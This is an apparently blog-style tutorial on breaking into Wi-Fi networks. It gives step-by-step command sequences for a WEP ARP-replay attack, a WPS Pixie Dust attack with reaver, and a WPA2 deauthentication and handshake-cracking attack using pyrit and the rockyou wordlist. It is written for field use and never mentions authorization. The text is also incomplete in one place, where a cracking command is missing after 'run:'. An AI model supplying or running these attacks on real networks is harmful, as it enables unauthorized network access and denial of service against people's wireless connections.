It’s common practice for aspiring hackers, these days, to commit to memory a few decent how-to hack guides and hit the field. There’s really nothing wrong with this because you have to start somewhere.
But this guide on how to hack wi-fi is meant for those who are frustrated at their lack of success hacking into wireless networks and consider just breaking into the place and hooking up your RJ45 cable to the router.
Don’t do that.
Instead, let me share a bit of salty wisdom I’ve gathered the hard way, so you don’t have to.
This guide is all about applying a methodology to your madness.
Rookie pentesters waste a lot of time in the field simply because of their order of operations.
I prefer to gather fruit starting at ground level and work my way up. This tactic of grabbing the ‘lowest hanging fruit’ will allow you to prioritize your exploits and see results sooner.
It’s exactly what it sounds like, too.
Go after the easiest targets first, then the next level, and the next level, and so on.
Let’s get started.
I could say that Open Networks are the obvious ground-level targets, and that would be mostly true. But, this guide is about hacking into wireless networks. Walking through the door isn’t so much breaking in.
So, let’s talk about an old dinosaur first…
You may never actually see one in the wild, depending on where you live, but you do need to add this to your repertoire. Lacking this knowledge is like mastering Linear Algebra but really sucking at long division.
It’s just silly not to know this.
So, sweep #1 is for WEP networks.
Retrieving the key for a WEP network can be done a few ways, but I’m going to outline my personal favorite.
Assuming I’m within range (at least mid -70s), this attack can be done in 5-10 minutes, or less in special cases.
All of the attacks in this guide begin with starting a monitor interface, so I’m only going to mention it once.
If you’re on Kali, the best way to do this is:
airmon-ng check kill; airmon-ng start
A quick explanation:
‘airmon-ng check kill’ stops networking processes that can get in the way of channel hopping and some other vital monitor functions. The latter part of the command takes down the wireless interface and replaces it with a monitor interface. In current (Kali-Rolling, 2017.1) versions of Kali, it will bring up an interface called wlan0mon (or wlan1mon, wlan2mon, etc…).
Next, let’s start capturing traffic to/from our target, we’ll need this information when we execute the crack:
airodump-ng --bssid -c -w wlan0mon
This command starts airodump-ng listening on the target channel, focused on the target AP’s BSSID (mac address), and writes the packets to a file.
In another tab/terminal window, we’ll need to fake authentication with the AP in order to set up the Arp Replay attack that will follow.
To do this, we’ll run:
aireplay-ng --fakeauth 6 -a wlan0mon
By not specifying a source mac address, aireplay-ng uses our own by default. The ‘6’ after –fakeauth is the delay between association attempts, 6 is a good default (for future reference).
Next up, the bulk of the attack:
aireplay-ng -3 -a wlan0mon
The fabulous Arp Replay attack.
My explanation won’t do it justice, but according to the Aircrack-ng website:
The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key.
Pretty awesome, right?
So, we’re listening for ARP packets, replaying them back to the AP (the AP accepts because of the Fake Auth attack), grabbing the new IVs, and repeating until we have plenty of data to work with.
Keep an eye on the ‘data’ column in airodump-ng, we’re going to start the last leg of the attack when that number reaches ~10,000.
When it does, open another tab and run:
You’ll want to pass the .cap file to aircrack-ng. Aircrack-ng will attempt to crack the key every 5k packets/IVs or so. At this point, your attack it on auto-pilot, so just sit back and watch the magic happen.
Let’s move on the the slightly higher-up fruit.
The Pixie Dust Attack
I’m not sure you could’ve chosen a more ridiculous name for this attack, but I love it none-the-less.
This attack exploits a weakness in WPS authentication (that fancy push button feature on printers and many other things), namely the pseudo-random number generators (PRNG) that certain AP chipsets employ as part of the key exhange process.
To sum it up, by capturing certain parts of the WPS authentication process and using some proprietary knowledge about the PRNG in use, we can calculate the PSK-1 and PSK-2 (encrypted parts of the WPS PIN) and retrieve the key. Practical application is as easy as first scanning for WPS enabled APs:
wash -i wlan0mon
This will output the BSSIDs, channels, WPS versions, and WPS status of every AP in range. We’ll need to copy the BSSID and channel, and run a lovely tool called Reaver:
reaver -i wlan0mon -vvv -K 1 -b -c
Without going into great detail, this command begins the Pixie Dust attack (the -K 1 option). You should see pretty quick results with this command. The attack works in seconds on APs that are within reasonable range and using a vulnerable chipset.
Always use this attack as part of your process. Always.
Many of you probably like to use Wifite to automate this type of attack. That’s well and good, those guys deserve credit for a terrific project, but there are some pitfalls I’ve noticed in the field.
Namely, the occurrence of false negatives concerning WPS status. Nearly 25% of the time, Wifite reports WPS as disabled when it is actually enabled and vulnerable.
So, stick to the manual wash/reaver method where possible.
The Most Boring Fruit
I barely even want to mention this attack because of how boring and wrought with failure it is. But, in the interest of being thorough, I often include it as a sidebar tactic in my own pentests. So, I’ll go over it briefly here.
How to crack WPA2 the hard way:
airodump-ng --bssid -w wlan0mon
Again, let’s fire up airodump-ng and start capturing packets.
The next step utilizes aireplay-ng to be a real Debbie Downer and DOS some WiFi:
aireplay-ng --deauth 20 -a wlan0mon
This will send deauth packets to the AP, causing it to kick off clients that are connected to it. This tactic is much more effective as a sniper tactic, targeting single clients (using the -h option and specifying their mac address). But, the above method is ok in a pinch.
You’ll have the most success with this attack by doing small bursts (the above example sends 20 packets, that is plenty in many cases) and waiting a minute or so before repeating. You want to give clients a chance to re-authenticate and complete those juicy 4-way-handshakes we’re looking for. After waiting for a few good handshakes, we can move on to cracking the key.
There are way too many ways to do this to include here, so I’ll just show you the most commonly used:
pyrit -r -i attack_passthrough
This is by no means the quickest method, but unless you are rocking some awesome GPUs, we’re just splitting hairs by comparing the different methods. Don’t just use aircrack-ng for this. Aside from the speed of your GPU/CPU, your wordlist is a crucial factor for success. I always start with rockyou.txt, a common password list
find / | grep rockyou
Pick a location and start cracking.
Priority is Everything
These are the basic attacks any hacker should have in their arsenal. I purposefully left out social engineering / spoofing attacks (Evil Twin AP, etc…), they belong in their own guide.
The final tool I’ll leave you with is probably the most overlooked: proper planning.
Going out in the field and attacking everything in every way is a great way to waste time and get nothing accomplished.
Scope out the area, run Kismet & Wash on your first outing and review the results at home.
Identify the lowest hanging fruit and start there.
Remember, getting in is only the beginning. There’s no shame in going the easy route.